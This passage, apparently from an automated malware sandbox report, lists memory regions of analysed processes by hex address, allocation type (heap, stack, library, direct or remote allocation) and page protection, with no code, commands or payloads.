|
page read and write
|
||
3BD7A000
|
heap
|
page read and write
|
||
2B07A332000
|
trusted library allocation
|
page read and write
|
||
1A2C432C000
|
heap
|
page read and write
|
||
25BDE000
|
stack
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
2BEE000
|
unkown
|
page read and write
|
||
314A57E000
|
unkown
|
page readonly
|
||
21C338B8000
|
heap
|
page read and write
|
||
314BD7E000
|
unkown
|
page readonly
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
29E1FE88000
|
trusted library allocation
|
page read and write
|
||
2B07C3A6000
|
heap
|
page read and write
|
||
2458000
|
direct allocation
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
1A2C430A000
|
heap
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
21C38F04000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
28CD0000
|
heap
|
page read and write
|
||
28E70000
|
trusted library allocation
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
21C33873000
|
heap
|
page read and write
|
||
2B00041B000
|
trusted library allocation
|
page read and write
|
||
2980000
|
direct allocation
|
page readonly
|
||
314B5FE000
|
stack
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
3D820000
|
heap
|
page read and write
|
||
7EB90000
|
direct allocation
|
page read and write
|
||
1401F000
|
stack
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
1A2C430F000
|
heap
|
page read and write
|
||
21C3A000000
|
heap
|
page read and write
|
||
2B07A0E7000
|
heap
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
19AC1767000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
1430E000
|
stack
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
19AC18E0000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
3BD48000
|
heap
|
page read and write
|
||
1A2C42FA000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
29E182D4000
|
heap
|
page read and write
|
||
7FFB05F50000
|
unkown
|
page read and write
|
||
41450000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C4188000
|
heap
|
page read and write
|
||
1A2C4398000
|
heap
|
page read and write
|
||
24084000
|
heap
|
page read and write
|
||
2985F000
|
unkown
|
page read and write
|
||
2B07C620000
|
heap
|
page read and write
|
||
1A2C9979000
|
trusted library allocation
|
page read and write
|
||
40BD0000
|
trusted library allocation
|
page read and write
|
||
1A2C41AA000
|
heap
|
page read and write
|
||
21C338A0000
|
heap
|
page read and write
|
||
3BE44000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
29E1828B000
|
heap
|
page read and write
|
||
C2F440C000
|
stack
|
page read and write
|
||
29E1C2FA000
|
trusted library allocation
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
28570000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
25AE0000
|
heap
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
314AE7B000
|
stack
|
page read and write
|
||
21C3385B000
|
heap
|
page read and write
|
||
13DBE000
|
stack
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
3BE80000
|
trusted library section
|
page read and write
|
||
1A2C3608000
|
trusted library allocation
|
page read and write
|
||
1A2C41CF000
|
heap
|
page read and write
|
||
2981E000
|
stack
|
page read and write
|
||
7EFE0000
|
direct allocation
|
page read and write
|
||
9A000
|
stack
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
28DD0000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
29E3273C000
|
heap
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
40AC0000
|
trusted library allocation
|
page read and write
|
||
4620000
|
heap
|
page read and write
|
||
2B07A0FF000
|
heap
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
21C33FF0000
|
trusted library allocation
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C4190000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
7FFAAB936000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41AA000
|
heap
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
44B000
|
remote allocation
|
page execute and read and write
|
||
3DC20000
|
heap
|
page read and write
|
||
40B90000
|
trusted library allocation
|
page read and write
|
||
D9370BE000
|
stack
|
page read and write
|
||
1A2C35C5000
|
trusted library allocation
|
page read and write
|
||
40A30000
|
trusted library allocation
|
page read and write
|
||
3D89D000
|
trusted library allocation
|
page execute and read and write
|
||
B80000
|
heap
|
page read and write
|
||
14C2D000
|
direct allocation
|
page read and write
|
||
1A2C48C1000
|
trusted library allocation
|
page read and write
|
||
19AC1620000
|
heap
|
page read and write
|
||
19AC174B000
|
heap
|
page read and write
|
||
414A0000
|
trusted library allocation
|
page read and write
|
||
7FFAABA20000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAABA40000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
3BDA1000
|
heap
|
page read and write
|
||
40B00000
|
trusted library allocation
|
page read and write
|
||
29710000
|
trusted library allocation
|
page read and write
|
||
4185F000
|
stack
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
40B90000
|
trusted library allocation
|
page read and write
|
||
41296000
|
heap
|
page read and write
|
||
29710000
|
trusted library allocation
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
1A2C436A000
|
heap
|
page read and write
|
||
14B26000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
25FF3000
|
trusted library allocation
|
page read and write
|
||
29E1A553000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
40B99000
|
trusted library allocation
|
page read and write
|
||
1A2C9830000
|
trusted library allocation
|
page read and write
|
||
3BE0A000
|
heap
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
1A2C4328000
|
heap
|
page read and write
|
||
1A2C4300000
|
heap
|
page read and write
|
||
7FFAABA30000
|
trusted library allocation
|
page read and write
|
||
2B07A0ED000
|
heap
|
page read and write
|
||
6EC41000
|
unkown
|
page execute read
|
||
29E324B0000
|
heap
|
page read and write
|
||
40B60000
|
trusted library allocation
|
page read and write
|
||
737000
|
heap
|
page read and write
|
||
7EC80000
|
direct allocation
|
page read and write
|
||
3BE66000
|
heap
|
page read and write
|
||
1A2C46CF000
|
heap
|
page read and write
|
||
19AC170A000
|
heap
|
page read and write
|
||
29EB0000
|
trusted library allocation
|
page read and write
|
||
29E1C1EF000
|
trusted library allocation
|
page read and write
|
||
40B80000
|
trusted library allocation
|
page read and write
|
||
40B40000
|
trusted library allocation
|
page read and write
|
||
4159E000
|
stack
|
page read and write
|
||
3BE2B000
|
heap
|
page read and write
|
||
25B47000
|
trusted library allocation
|
page execute and read and write
|
||
2420000
|
direct allocation
|
page read and write
|
||
3BED6000
|
heap
|
page read and write
|
||
97F000
|
stack
|
page read and write
|
||
28E50000
|
trusted library allocation
|
page read and write
|
||
40C00000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29CB000
|
heap
|
page read and write
|
||
24078000
|
heap
|
page read and write
|
||
7FFB05F50000
|
unkown
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
40BB0000
|
trusted library allocation
|
page read and write
|
||
7FFAABB00000
|
trusted library allocation
|
page read and write
|
||
25BE0000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
7FFAAB840000
|
trusted library allocation
|
page read and write
|
||
3BEB0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
7FFAABA32000
|
trusted library allocation
|
page read and write
|
||
3BD6E000
|
stack
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
1A2C41BB000
|
heap
|
page read and write
|
||
4140D000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
3DCFF000
|
stack
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
40BC0000
|
trusted library allocation
|
page read and write
|
||
3BE60000
|
heap
|
page read and write
|
||
44B000
|
remote allocation
|
page execute and read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
C2F34BF000
|
stack
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C46D7000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
7FFAAB8E0000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
3BDF6000
|
heap
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
1A2C4377000
|
heap
|
page read and write
|
||
2B010001000
|
trusted library allocation
|
page read and write
|
||
74E000
|
stack
|
page read and write
|
||
1A2C46CB000
|
heap
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
13C81000
|
direct allocation
|
page read and write
|
||
4132D000
|
heap
|
page read and write
|
||
4F0000
|
remote allocation
|
page execute and read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
28510000
|
trusted library allocation
|
page read and write
|
||
1A2C9850000
|
trusted library allocation
|
page read and write
|
||
459000
|
unkown
|
page write copy
|
||
3D967000
|
heap
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
3D893000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C35C0000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C4391000
|
heap
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
28E19000
|
trusted library allocation
|
page read and write
|
||
418DF000
|
stack
|
page read and write
|
||
29E326B0000
|
heap
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
57E000
|
unkown
|
page readonly
|
||
40B5E000
|
trusted library allocation
|
page read and write
|
||
1A2C4366000
|
heap
|
page read and write
|
||
7F0E4000
|
direct allocation
|
page read and write
|
||
24D0000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
24083000
|
heap
|
page read and write
|
||
C2F3639000
|
stack
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
7FFAAB854000
|
trusted library allocation
|
page read and write
|
||
142BF000
|
stack
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
41420000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
25B04000
|
trusted library allocation
|
page read and write
|
||
28522000
|
trusted library allocation
|
page read and write
|
||
41293000
|
heap
|
page read and write
|
||
3DBBC000
|
stack
|
page read and write
|
||
24055000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
29E1BF5A000
|
trusted library allocation
|
page read and write
|
||
28E60000
|
trusted library allocation
|
page read and write
|
||
29E1A051000
|
trusted library allocation
|
page read and write
|
||
41C40000
|
trusted library allocation
|
page read and write
|
||
1A2C48C3000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
14EAE000
|
heap
|
page read and write
|
||
D936D7F000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
25AD0000
|
trusted library section
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
2957E000
|
stack
|
page read and write
|
||
4161E000
|
unkown
|
page read and write
|
||
40BB0000
|
trusted library allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
13C7A000
|
direct allocation
|
page read and write
|
||
2B07A0E3000
|
heap
|
page read and write
|
||
314AC7C000
|
stack
|
page read and write
|
||
1A2C98D3000
|
trusted library allocation
|
page read and write
|
||
1A2C4188000
|
heap
|
page read and write
|
||
2900000
|
direct allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
unkown
|
page execute and read and write
|
||
3DE3A000
|
trusted library allocation
|
page read and write
|
||
7FFB05F55000
|
unkown
|
page readonly
|
||
29680000
|
trusted library allocation
|
page read and write
|
||
2906F000
|
stack
|
page read and write
|
||
21C346B0000
|
trusted library section
|
page readonly
|
||
21C33878000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
3D920000
|
heap
|
page read and write
|
||
145DE000
|
stack
|
page read and write
|
||
1A2C41AA000
|
heap
|
page read and write
|
||
1A2C4391000
|
heap
|
page read and write
|
||
7FFAAB85D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAABA0A000
|
trusted library allocation
|
page read and write
|
||
411AC000
|
stack
|
page read and write
|
||
1A2C4364000
|
heap
|
page read and write
|
||
3BE90000
|
heap
|
page read and write
|
||
314A477000
|
stack
|
page read and write
|
||
296C7000
|
trusted library allocation
|
page read and write
|
||
416000
|
unkown
|
page readonly
|
||
41398000
|
heap
|
page read and write
|
||
1A2C4749000
|
heap
|
page read and write
|
||
1A2C46D6000
|
heap
|
page read and write
|
||
40DEF000
|
stack
|
page read and write
|
||
29E323B0000
|
heap
|
page read and write
|
||
21EC000
|
direct allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
414C0000
|
trusted library allocation
|
page read and write
|
||
7F0C0000
|
direct allocation
|
page read and write
|
||
1A2C46D6000
|
heap
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
3DDA0000
|
trusted library allocation
|
page read and write
|
||
3DD89000
|
trusted library allocation
|
page read and write
|
||
29730000
|
trusted library allocation
|
page read and write
|
||
40A20000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41A30000
|
remote allocation
|
page read and write
|
||
21C38D50000
|
trusted library allocation
|
page read and write
|
||
41490000
|
trusted library allocation
|
page read and write
|
||
1A2C9976000
|
trusted library allocation
|
page read and write
|
||
3D940000
|
trusted library allocation
|
page execute and read and write
|
||
29E18293000
|
heap
|
page read and write
|
||
1A2C9890000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
7FFAAB84B000
|
trusted library allocation
|
page read and write
|
||
1A2C4368000
|
heap
|
page read and write
|
||
2402000
|
direct allocation
|
page read and write
|
||
29E182AB000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
1A2C3644000
|
trusted library allocation
|
page read and write
|
||
1A2C41BF000
|
heap
|
page read and write
|
||
1A2C4730000
|
heap
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
21C38EDF000
|
heap
|
page read and write
|
||
29E18220000
|
heap
|
page read and write
|
||
41431000
|
trusted library allocation
|
page read and write
|
||
314AFFE000
|
stack
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
29E19CD0000
|
trusted library allocation
|
page read and write
|
||
1A2C3930000
|
heap
|
page read and write
|
||
243C000
|
direct allocation
|
page read and write
|
||
21C38EF7000
|
heap
|
page read and write
|
||
426000
|
remote allocation
|
page execute and read and write
|
||
41315000
|
heap
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
2380000
|
direct allocation
|
page execute and read and write
|
||
3C0AF000
|
stack
|
page read and write
|
||
3BDD7000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
314B0FE000
|
stack
|
page read and write
|
||
3DE6A000
|
trusted library allocation
|
page read and write
|
||
7F110000
|
direct allocation
|
page read and write
|
||
411D9000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
297F0000
|
trusted library allocation
|
page read and write
|
||
8D0000
|
remote allocation
|
page execute and read and write
|
||
25B40000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C46CC000
|
heap
|
page read and write
|
||
19AC1772000
|
heap
|
page read and write
|
||
1A2C3940000
|
trusted library allocation
|
page read and write
|
||
6EC5F000
|
unkown
|
page readonly
|
||
414D0000
|
trusted library allocation
|
page read and write
|
||
29E32432000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
40D000
|
unkown
|
page write copy
|
||
28D00000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
29B0000
|
heap
|
page read and write
|
||
21C38CC0000
|
trusted library allocation
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
C2F383C000
|
stack
|
page read and write
|
||
19AC1766000
|
heap
|
page read and write
|
||
19AC18ED000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
13BD8000
|
direct allocation
|
page read and write
|
||
29750000
|
trusted library allocation
|
page read and write
|
||
7FFAABA40000
|
trusted library allocation
|
page execute and read and write
|
||
418E0000
|
heap
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
1A2C46E1000
|
heap
|
page read and write
|
||
3D880000
|
trusted library allocation
|
page read and write
|
||
19AC1757000
|
heap
|
page read and write
|
||
7FFAABC10000
|
trusted library allocation
|
page read and write
|
||
24065000
|
heap
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
C2F30FE000
|
unkown
|
page read and write
|
||
7F1B0000
|
direct allocation
|
page read and write
|
||
28E8D000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
7FDF0000
|
trusted library allocation
|
page execute and read and write
|
||
29E19C80000
|
trusted library allocation
|
page read and write
|
||
40B30000
|
trusted library allocation
|
page read and write
|
||
29E1C201000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
B3C000
|
stack
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
7126B4E000
|
stack
|
page read and write
|
||
1A2C4341000
|
heap
|
page read and write
|
||
7EB60000
|
direct allocation
|
page read and write
|
||
314BB7E000
|
unkown
|
page readonly
|
||
1A2C42EC000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
25DF000
|
direct allocation
|
page read and write
|
||
314B47E000
|
unkown
|
page readonly
|
||
40AA0000
|
trusted library allocation
|
page read and write
|
||
D936CFE000
|
stack
|
page read and write
|
||
28E20000
|
trusted library allocation
|
page read and write
|
||
29E32732000
|
heap
|
page read and write
|
||
3BDB8000
|
heap
|
page read and write
|
||
41DC0000
|
trusted library allocation
|
page read and write
|
||
71266DF000
|
stack
|
page read and write
|
||
21C34113000
|
heap
|
page read and write
|
||
7FFAAB90C000
|
trusted library allocation
|
page execute and read and write
|
||
3BEC3000
|
trusted library allocation
|
page execute and read and write
|
||
28DD0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A9000
|
heap
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
21C337D0000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
29E18258000
|
heap
|
page read and write
|
||
7FBF0000
|
direct allocation
|
page read and write
|
||
14B20000
|
heap
|
page read and write
|
||
2950E000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29730000
|
trusted library allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
40B20000
|
trusted library allocation
|
page read and write
|
||
3BE3D000
|
heap
|
page read and write
|
||
2201000
|
direct allocation
|
page read and write
|
||
3D8A0000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29E1A557000
|
trusted library allocation
|
page read and write
|
||
7FFAABB10000
|
trusted library allocation
|
page read and write
|
||
29730000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
13B3F000
|
direct allocation
|
page read and write
|
||
28CB0000
|
trusted library allocation
|
page read and write
|
||
2999E000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
3BE1A000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
13C6C000
|
stack
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
7FFAABAB0000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
8D0000
|
unkown
|
page execute and read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29700000
|
trusted library allocation
|
page read and write
|
||
4161E000
|
unkown
|
page read and write
|
||
3DDA7000
|
trusted library allocation
|
page read and write
|
||
3BDCB000
|
heap
|
page read and write
|
||
41478000
|
trusted library allocation
|
page read and write
|
||
2B07A3E0000
|
heap
|
page read and write
|
||
21E4000
|
direct allocation
|
page read and write
|
||
7FFAABA80000
|
trusted library allocation
|
page read and write
|
||
314B77E000
|
stack
|
page read and write
|
||
62E000
|
heap
|
page read and write
|
||
2B07A330000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
D936E3F000
|
stack
|
page read and write
|
||
28E10000
|
trusted library allocation
|
page read and write
|
||
414C0000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
2461000
|
direct allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
2B07C250000
|
heap
|
page execute and read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
7F970000
|
direct allocation
|
page read and write
|
||
29E32490000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
7EC30000
|
direct allocation
|
page read and write
|
||
7FFAABB30000
|
trusted library allocation
|
page read and write
|
||
461F000
|
stack
|
page read and write
|
||
1A2C4717000
|
heap
|
page read and write
|
||
1A2C41AA000
|
heap
|
page read and write
|
||
41D80000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C46DD000
|
heap
|
page read and write
|
||
40A80000
|
trusted library allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
21C34540000
|
trusted library allocation
|
page read and write
|
||
21C38CA0000
|
trusted library allocation
|
page read and write
|
||
7F0C0000
|
direct allocation
|
page read and write
|
||
4140D000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
28E90000
|
trusted library allocation
|
page read and write
|
||
2B2D000
|
stack
|
page read and write
|
||
1A2C4155000
|
heap
|
page read and write
|
||
29E32730000
|
heap
|
page read and write
|
||
459000
|
unkown
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
314BC7B000
|
stack
|
page read and write
|
||
5DE000
|
heap
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
24069000
|
heap
|
page read and write
|
||
40A50000
|
trusted library allocation
|
page read and write
|
||
13DDE000
|
stack
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
4040F000
|
stack
|
page read and write
|
||
2B07C17B000
|
heap
|
page read and write
|
||
29E1BF8A000
|
trusted library allocation
|
page read and write
|
||
21C3411A000
|
heap
|
page read and write
|
||
29AB000
|
direct allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
23FA0000
|
heap
|
page read and write
|
||
21C38DD0000
|
trusted library allocation
|
page read and write
|
||
2B001794000
|
trusted library allocation
|
page read and write
|
||
21C336C0000
|
heap
|
page read and write
|
||
25B3A000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
2409000
|
direct allocation
|
page read and write
|
||
3D8BB000
|
trusted library allocation
|
page execute and read and write
|
||
29E323A0000
|
heap
|
page read and write
|
||
24060000
|
heap
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C4326000
|
heap
|
page read and write
|
||
1A2C9977000
|
trusted library allocation
|
page read and write
|
||
3BE5A000
|
heap
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
41372000
|
heap
|
page read and write
|
||
6EC5D000
|
unkown
|
page read and write
|
||
1A2C41CF000
|
heap
|
page read and write
|
||
3CC000
|
stack
|
page read and write
|
||
7FFAABA70000
|
trusted library allocation
|
page read and write
|
||
1A2C9890000
|
trusted library allocation
|
page execute
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
2B07C270000
|
heap
|
page read and write
|
||
6EC40000
|
unkown
|
page readonly
|
||
1A2C435E000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C4377000
|
heap
|
page read and write
|
||
314AB7E000
|
unkown
|
page readonly
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
3BE38000
|
heap
|
page read and write
|
||
25B60000
|
trusted library allocation
|
page read and write
|
||
1A2C4175000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
7EBE0000
|
direct allocation
|
page read and write
|
||
24E0000
|
direct allocation
|
page read and write
|
||
1A2C42ED000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
327F000
|
unkown
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
40AF0000
|
trusted library allocation
|
page read and write
|
||
7FFAABA60000
|
trusted library allocation
|
page read and write
|
||
3BE30000
|
heap
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
40CEE000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
25B45000
|
trusted library allocation
|
page execute and read and write
|
||
25C60000
|
heap
|
page read and write
|
||
3DE58000
|
trusted library allocation
|
page read and write
|
||
40A30000
|
trusted library allocation
|
page read and write
|
||
3EEB0000
|
trusted library allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
2B07BD50000
|
heap
|
page read and write
|
||
28DC000
|
direct allocation
|
page read and write
|
||
3DD7F000
|
trusted library allocation
|
page read and write
|
||
40BB0000
|
trusted library allocation
|
page read and write
|
||
7FFAABBA0000
|
trusted library allocation
|
page read and write
|
||
7F970000
|
direct allocation
|
page read and write
|
||
7F0B0000
|
direct allocation
|
page read and write
|
||
3BDF4000
|
heap
|
page read and write
|
||
40A90000
|
trusted library allocation
|
page read and write
|
||
1A2C4303000
|
heap
|
page read and write
|
||
241BE000
|
stack
|
page read and write
|
||
1A2C46C0000
|
heap
|
page read and write
|
||
1A2C4191000
|
heap
|
page read and write
|
||
21C34015000
|
heap
|
page read and write
|
||
1A2C418F000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C4305000
|
heap
|
page read and write
|
||
21C38DB0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7FFAABC20000
|
trusted library allocation
|
page read and write
|
||
19AC170D000
|
heap
|
page read and write
|
||
314B57E000
|
unkown
|
page readonly
|
||
C2F430D000
|
stack
|
page read and write
|
||
2B010082000
|
trusted library allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
4171E000
|
stack
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
1A2C4711000
|
heap
|
page read and write
|
||
1A2C4980000
|
